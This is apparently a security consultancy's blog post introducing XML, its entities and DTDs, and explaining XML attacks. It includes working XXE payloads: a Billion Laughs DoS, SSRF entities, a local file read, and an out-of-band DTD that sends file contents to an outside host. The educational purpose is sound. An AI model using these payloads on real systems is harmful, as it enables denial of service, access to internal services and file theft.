XML – An Overview Banner

What Are the Risks of XML? – Blog Series – Part #01

The eXtensible Markup Language (XML) is one of the most widely used languages to represent hierarchical data. The popularity of XML goes hand in hand with the use of AJAX [9] at the dawn of the modern Internet [2]. Although XML has been superseded as the Internet's leading data exchange format by JSON [2], the format has left its mark on today's technology landscape. After all, whatever you do on your PC these days, you are—consciously or unconsciously—most likely using XML.

Here are some relevant examples: Microsoft's Office files, i.e. .docx, .xlsx, or .pptx, use XML internally. SVG, a widely used file format for vector graphics, is directly based on XML. The search engine Shodan [8] currently lists more than three million devices and servers that use XML for data exchange.¹ In total, the file format archive lists 185 file formats that include XML [3].² We will report on the different use cases of XML in more detail in the second post of this series.

But why is XML security-relevant, and what has to be considered when using it? The OWASP Top 10 [1] lists the biggest security risks for web applications and has established itself as a de facto standard in the field of web security. In the 2017 version of the Top 10 list, XML External Entity (XXE) attacks were ranked fourth.³ XXE attacks are just one type of attack based on or targeting XML. In general, XML enables a wide variety of attack classes, including Local File Inclusion, Server-Side Request Forgery, and Denial of Service. This wide range of attack possibilities makes an understanding of XML and the attacks on the format an important part of any security analysis.

In this blog series, we would like to explain the XML data format and selected attacks on the format, and deal with the typical scenarios in which it is used.


XML – An Introduction

XML Syntax

XML is specified by the World Wide Web Consortium [4]. The format allows data to be represented in a tree-like hierarchical structure. It is therefore often used for serializing information. XML has a strictly defined structure: each element has a tag and optionally attributes, a value, and child elements. An example of the different elements can be seen in Listing 1.

An element is identified by the tag. If an element has no value, it can be self-closing (<element/>), otherwise each element has an opening and closing tag (<element>...</element>). Attributes are key=value pairs stored in the tag of an element. Values are located between the tags and must not themselves contain XML syntax.

If text that contains XML syntax is to be included in a document, it must be enclosed in a <![CDATA[...]]> section. The parser then treats the enclosed text as plain character data and does not attempt to parse it as XML.
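The effect of a CDATA section can be checked with a few lines of Python. This is only a small sketch using the standard library's xml.etree.ElementTree; the element name snippet and the sample text are made up for this illustration.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: the text inside CDATA looks like markup,
# but the parser hands it over as plain character data.
doc = "<snippet><![CDATA[<b>bold</b> & more]]></snippet>"
root = ET.fromstring(doc)

cdata_text = root.text   # the literal text, including "<b>" and "&"
child_count = len(root)  # number of child elements of <snippet>

print(cdata_text)
print(child_count)
```

Without the CDATA section, the same text would have to be written with escaped characters, otherwise the parser would read <b> as a child element.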

<?xml version="1.0" encoding="utf-8"?>
<company name="Hackmanit" location="Bochum">
  <services>
    <service>training</service>
    <service>penetration testing</service>
  </services>
  <areas>
    <area name="web security"/>
    <area name="single sign-on" short="sso"/>
    <area name="tls"/>
  </areas>
</company>

XML Elements – An overview of the different types. (Listing 1)
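To make the terms tag, attribute, value, and child element more concrete, the following sketch reads Listing 1 with Python's standard xml.etree.ElementTree module. The variable names are our own choice; other parsers and languages expose the same tree in a similar way.

```python
import xml.etree.ElementTree as ET

# Listing 1, passed as bytes so the declared encoding is honoured.
LISTING_1 = b"""<?xml version="1.0" encoding="utf-8"?>
<company name="Hackmanit" location="Bochum">
  <services>
    <service>training</service>
    <service>penetration testing</service>
  </services>
  <areas>
    <area name="web security"/>
    <area name="single sign-on" short="sso"/>
    <area name="tls"/>
  </areas>
</company>"""

root = ET.fromstring(LISTING_1)

root_tag = root.tag                # tag of the root element
root_attributes = dict(root.attrib)  # key=value pairs from the opening tag

# Values: the text between the opening and closing <service> tags.
services = [service.text for service in root.iter("service")]

# Self-closing elements have attributes but no value.
areas = {area.get("name"): area.get("short") for area in root.iter("area")}

print(root_tag, root_attributes)
print(services)
print(areas)
```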


What Are XML Entities?

To escape XML syntax, so-called entities are used; anyone who has ever read HTML code knows the syntax. For example, to display the symbol < you can use the entity reference &lt;, where lt is the entity's name. The ampersand and the semicolon delimit the reference, which the parser replaces with the character value stored in the entity lt.
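As a brief illustration of the predefined entities, the sketch below escapes a string with Python's xml.sax.saxutils helpers and lets a parser resolve the references again. The sample string and the element name expr are assumptions made for this example.

```python
from xml.sax.saxutils import escape, unescape
import xml.etree.ElementTree as ET

raw = "1 < 2 & 3 > 2"

# escape() replaces &, < and > with the predefined entity references.
escaped = escape(raw)

# A parser resolves the references back to the original characters.
parsed_text = ET.fromstring(f"<expr>{escaped}</expr>").text

print(escaped)
print(parsed_text)
```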

The special feature of these entities is that in addition to predefined entities—which escape XML syntax—there is also the possibility to define your own entities. This is possible through a so-called Document Type Definition (DTD). DTDs are part of the XML specification and are actually intended to define the structure and types of the document. What makes the DTD and the entities especially relevant for a security analysis is the ability to access local and remote data.

There are four different types of entities that can be defined using a DTD. There are general and parameter entities:

  • General entities work similarly to the predefined entities like &lt;. That is, they are replaced in the XML document by a predefined string.
  • Parameter entities are only valid within the DTD and can be used to parameterize other parts of the DTD. They are referenced like general entities, but with a % instead of the &: %parameterEntity;

These entities can be either Internal or External:

  • Internal Entities are effectively predefined strings that are stored in the DTD.
  • External entities, on the other hand, are strings that come from an external source. The sources can be local files as well as files from a remote server. To achieve this, the SYSTEM keyword is used. It is followed by an identifier that the parser resolves, and the scheme at the beginning of that identifier determines how the resource is loaded. For example, an external file can be loaded via file:// or http://.
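How the scheme of a SYSTEM identifier hints at the source can be sketched in a few lines of Python. The function name source_kind and its three categories are our own simplification, not part of the XML specification; which schemes a parser actually supports depends on the parser.

```python
from urllib.parse import urlsplit

def source_kind(system_identifier: str) -> str:
    """Roughly classify a SYSTEM identifier by its scheme (simplified)."""
    scheme = urlsplit(system_identifier).scheme.lower()
    if scheme == "file":
        return "local file"
    if scheme in ("http", "https", "ftp"):
        return "remote server"
    if scheme == "":
        # No scheme: resolved relative to the location of the document or DTD.
        return "relative"
    return "other"

for identifier in (
    "file:///sys/power/image_size",
    "http://example.com/external.dtd",
    "local-file.txt",
):
    print(identifier, "->", source_kind(identifier))
```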

Listing 2 contains examples for all four types of entities described before.

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY internalGeneral "This is an internally defined general entity.">
  <!ENTITY externalGeneral SYSTEM "local-file.txt">
  <!ENTITY % internalParameter "<!ENTITY ent 'I am available once internalParameter has been referenced'>">
  %internalParameter;
  <!ENTITY % externalParameter SYSTEM "http://example.com/external.dtd">
  %externalParameter;
]>
...

DTD Entities – Examples of the four different types. (Listing 2)
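The simplest of the four cases, the internal general entity, can be tried out directly. The sketch below uses Python's xml.etree.ElementTree, which resolves internally defined entities; the root element data and the reference inside it are added for this illustration. External entities are deliberately left out, since their handling differs considerably between parsers.

```python
import xml.etree.ElementTree as ET

# Internal general entity from Listing 2, referenced once in the document body.
doc = """<!DOCTYPE data [
  <!ENTITY internalGeneral "This is an internally defined general entity.">
]>
<data>&internalGeneral;</data>"""

root = ET.fromstring(doc)
expanded = root.text  # the reference has been replaced by the entity's value

print(expanded)
```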


What Are the XML Attacks?

As already mentioned, there are different types of attacks that are possible using XML. In the following, we present selected attacks and explain how they work. For a detailed overview of more known attacks, there are many good sources, e.g. the XXE Cheat Sheet [5].

Denial of Service

Denial of Service (DoS) attacks are designed to overload a piece of software or a service so that legitimate requests can no longer be processed. This can happen through input that triggers a crash, or through data that takes so much computing power or memory to process that the service becomes unusable.

In the case of XML, the idea is similar to that of an archive bomb [6]: A small XML document is constructed, which causes the service to enter an infinite loop or take up an unexpected amount of memory during parsing.

Listing 3 shows an example of the so-called “Billion Laughs” attack.⁴ This attack exploits the fact that the value of an entity may reference other entities, which can be nested to any depth. First, an entity a0 is defined which contains the text lol. This entity is then referenced ten times in the next entity a1, so a1 contains the text lol 10 times after the references are resolved. Entity a2 in turn references a1 ten times and thus contains the text lol 10 × 10 times. This step can be repeated until the desired number of nesting levels or the desired factor is reached. In our example, the entity lol ends up containing the text lol 10¹⁰ (i.e., 10 billion) times.

Storing a string of this length in Java would require about 60 GB of memory, assuming 2 bytes for each of the 3 × 10¹⁰ characters [7].

<!DOCTYPE data [
  <!ENTITY a0 "lol" >
  <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
  <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
  <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
  <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;">
  ...
  <!ENTITY lol "&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;&a9;">
]>

Billion Laughs – Example of a DoS attack [5]. (Listing 3)
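The growth described above can be reproduced with a short Python sketch. The helper names build_payload and expanded_length are hypothetical, the top-level entity is called a10 here instead of lol, and the 2 bytes per character are an assumption. Only a harmless two-level variant is actually parsed; the full payload is merely measured, not expanded.

```python
import xml.etree.ElementTree as ET

def build_payload(levels: int, base: str = "lol", fanout: int = 10) -> str:
    """Build a document with `levels` nested entity definitions on top of a0."""
    decls = [f'<!ENTITY a0 "{base}">']
    for i in range(1, levels + 1):
        refs = f"&a{i - 1};" * fanout
        decls.append(f'<!ENTITY a{i} "{refs}">')
    dtd = "\n  ".join(decls)
    return f"<!DOCTYPE data [\n  {dtd}\n]>\n<data>&a{levels};</data>"

def expanded_length(levels: int, base: str = "lol", fanout: int = 10) -> int:
    """Number of characters after all references are resolved."""
    return len(base) * fanout ** levels

# Harmless variant with two levels: parse it and measure the result.
small_len = len(ET.fromstring(build_payload(2)).text)

# Full variant as in Listing 3: only computed, never parsed.
payload_size = len(build_payload(10))   # size of the document sent
full_chars = expanded_length(10)        # characters after expansion
full_bytes = full_chars * 2             # assumption: 2 bytes per character

print(small_len, payload_size, full_chars, full_bytes)
```

The document itself stays well below one kilobyte, while the expanded text would need tens of gigabytes.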


Server-Side Request Forgery (SSRF)

External entities can be used to integrate external data. This functionality can be abused to make a vulnerable server send requests on the attacker's behalf. If the vulnerable server has privileged access to the target service, such a request can read sensitive data or, if the service accepts parameters in GET requests, change data.⁵ This attack class also allows requests to be sent to systems that are only reachable from internal networks or are protected by a firewall.

The first example in Listing 4 shows how the file file.xml is fetched from an external server. In this scenario, the example.com server is only accessible to the vulnerable server that parses the XML, but not to the attacker (secured against external access). The attack still allows the attacker to read the data in file.xml. The second example shows how, in a similar scenario, a GET request is used to set new data on the server.

Example 1: External file from a secured system [5].

<!DOCTYPE data [
  <!ENTITY remote SYSTEM "http://example.com/file.xml">
]>
<data>&remote;</data>

Example 2: GET request to a secured system.

<!DOCTYPE data [
  <!ENTITY remote SYSTEM "http://example.com?new_pw=123456">
]>
<data>&remote;</data>

SSRF Attacks – Example of different SSRF attacks using External General Entities. (Listing 4)
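To see which requests such a document would ask a vulnerable parser to make, the external entities can be listed without fetching anything. The following sketch uses Python's xml.parsers.expat with an EntityDeclHandler; the function name external_entity_targets is our own. No external-entity handler is installed, so nothing is actually requested here.

```python
import xml.parsers.expat

def external_entity_targets(xml_text: str) -> list:
    """Return (entity name, system identifier) for every external entity declared."""
    targets = []

    def on_entity_decl(name, is_parameter, value, base, system_id, public_id, notation):
        # Internal entities carry a value; external ones carry a system identifier.
        if system_id is not None:
            targets.append((name, system_id))

    parser = xml.parsers.expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    parser.Parse(xml_text, True)
    return targets

# Example 1 from Listing 4.
example_1 = """<!DOCTYPE data [
  <!ENTITY remote SYSTEM "http://example.com/file.xml">
]>
<data>&remote;</data>"""

targets = external_entity_targets(example_1)
print(targets)
```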


Local File Inclusion

This type of attack uses the DTD syntax to read local files. Their content is then inserted into the XML document. If the XML document is returned as a response or displayed in an application, the information can be stolen.

Listing 5 shows an example of reading a file from a Linux system. The content of the file is present in the XML document after parsing and can—depending on the application—be accessible to an attacker.

<!DOCTYPE data [
  <!ENTITY file SYSTEM "file:///sys/power/image_size">
]>
<data>&file;</data>

Local File Inclusion – An example attack with External General Entities [5]. (Listing 5)


If there is no direct feedback, an indirect channel can be used to extract the data (out-of-band attacks). This is possible through parameter entities, which are also resolved if they are located in the URL of an external entity. The XML specification does not allow parameter entity references inside declarations in the internal part of a DTD, which should rule out this approach. However, this restriction does not apply to external DTDs, so it can often be circumvented by loading one.

Listing 6 shows how to load an external DTD in the parsed XML document. This external DTD loads a file from local storage (as in Listing 5), but does not insert the contents of the file into the XML document directly. Instead, the file content is appended as a parameter to a URL that is called afterwards. From the request to the URL, the contents of the local file can eventually be read.

Malicious XML document that loads an external DTD:

<!DOCTYPE data SYSTEM "http://example.com/parameter-entity-oob.dtd">
<data>&send;</data>

DTD available at http://example.com/parameter-entity-oob.dtd:

<!ENTITY % file SYSTEM "file:///sys/power/image_size">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>">
%all;

Out-Of-Band Attack – An Example [5]. (Listing 6)
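The substitution steps of Listing 6 can be traced by hand. The sketch below only simulates them with plain string operations in Python; it does not parse any DTD and sends no request. The value of file_content is a made-up stand-in for the content of the local file.

```python
from urllib.parse import urlsplit

# Assumption: stand-in for the content of file:///sys/power/image_size.
file_content = "2147483648"

# Value of the parameter entity "all" from Listing 6, before %file; is resolved.
all_template = "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>"

# Step 1: the parser substitutes %file; while building the value of "all".
all_resolved = all_template.replace("%file;", file_content)

# Step 2: referencing %all; declares the general entity "send" with this URL.
send_url = all_resolved.split("'")[1]

# Step 3: resolving &send; requests the URL; the receiving server sees the query.
leaked = urlsplit(send_url).query

print(send_url)
print(leaked)
```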




Part #02 – Where Is XML Used in Practice?

The second part of the blog series on the XML format deals with the answer to this question. The blog post provides information about the scenarios in which XML is used and helps you to uncover potential vulnerabilities in your systems.

Blog Series – What Are the Risks of XML? – All parts at a glance

Part #01 – XML – An Overview

Part #02 – Where Is XML Used in Practice?

Part #03 – Finding XXE Attacks in 3 Steps ---> Soon






¹ https://www.shodan.io/search?query=%22Content-Type%3A+text%2Fxml%22 searches for all entries in the database which have Content-Type: text/xml in the HTTP header.

² https://fileinfo.com/ has listed 126 file types that use XML directly and 910 file types where XML plays a role in the description.

³ In the latest version of 2021, XXE attacks are no longer listed separately, but are included in a larger category. The category "Security Misconfiguration" is listed in fifth place.

⁴ The names and texts themselves are not relevant. The name of the attack originates from the original example with the text lol (laughing-out-loud), meaning "billions of laughs".

⁵ Setting values via GET requests should generally be avoided [10] and sensitive data should also not appear in the URL parameters of a GET request [11].



[1] https://owasp.org/Top10/

[2] https://www.toptal.com/web/json-vs-xml-part-1

[3] http://fileformats.archiveteam.org/wiki/Category:XML_based_file_formats

[4] https://www.w3.org/TR/2008/REC-xml-20081126/

[5] https://web-in-security.blogspot.com/2016/03/xxe-cheat-sheet.html

[6] https://de.wikipedia.org/wiki/Archivbombe

[7] https://www.javamex.com/tutorials/memory/string_memory_usage.shtml

[8] https://help.shodan.io/the-basics/what-is-shodan

[9] https://developer.mozilla.org/en-US/docs/Web/Guide/AJAX

[10] https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET

[11] https://cwe.mitre.org/data/definitions/598.html




Prof. Dr. Juraj Somorovsky

Your Contact for XML Security and SOAP